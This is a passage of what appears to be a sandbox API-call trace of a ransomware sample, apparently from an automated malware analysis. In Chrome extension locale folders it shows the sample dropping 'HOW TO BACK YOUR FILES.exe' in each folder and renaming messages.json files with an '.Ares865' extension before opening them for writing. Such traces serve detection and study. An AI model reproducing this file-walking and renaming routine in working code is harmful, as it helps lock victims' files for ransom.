Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo" [0101.832] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.832] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.832] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.833] GetLastError () returned 0x0 [0101.833] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.833] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f07fa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e788e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e788e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.833] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.833] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.833] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.833] lstrlenW (lpString="messages.json") returned 13 [0101.833] lstrlenW (lpString="Ares865") returned 7 [0101.833] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.833] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.Ares865") returned 160 [0101.834] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=450) returned 1 [0101.839] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko" [0101.840] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko" [0101.840] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.840] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.840] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.841] GetLastError () returned 0x0 [0101.841] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e788e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e788e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.841] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.841] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.841] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.841] lstrlenW (lpString="messages.json") returned 13 [0101.841] lstrlenW (lpString="Ares865") returned 7 [0101.841] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.841] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.Ares865") returned 160 [0101.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0101.848] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn" [0101.848] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn" [0101.848] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.848] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.848] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.849] GetLastError () returned 0x0 [0101.849] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.849] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.849] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.849] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.849] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.849] lstrlenW (lpString="messages.json") returned 13 [0101.849] lstrlenW (lpString="Ares865") returned 7 [0101.849] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.849] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.Ares865") returned 160 [0101.850] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=327) returned 1 [0101.855] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km" [0101.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km" [0101.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.856] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.856] GetLastError () returned 0x0 [0101.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.856] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.856] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.856] lstrlenW (lpString="messages.json") returned 13 [0101.856] lstrlenW (lpString="Ares865") returned 7 [0101.856] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.857] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.Ares865") returned 160 [0101.857] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\km\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.858] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=607) returned 1 [0101.861] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka" [0101.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka" [0101.862] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.862] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.862] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.863] GetLastError () returned 0x0 [0101.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.863] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.863] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.863] lstrlenW (lpString="messages.json") returned 13 [0101.863] lstrlenW (lpString="Ares865") returned 7 [0101.863] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.863] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.Ares865") returned 160 [0101.863] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 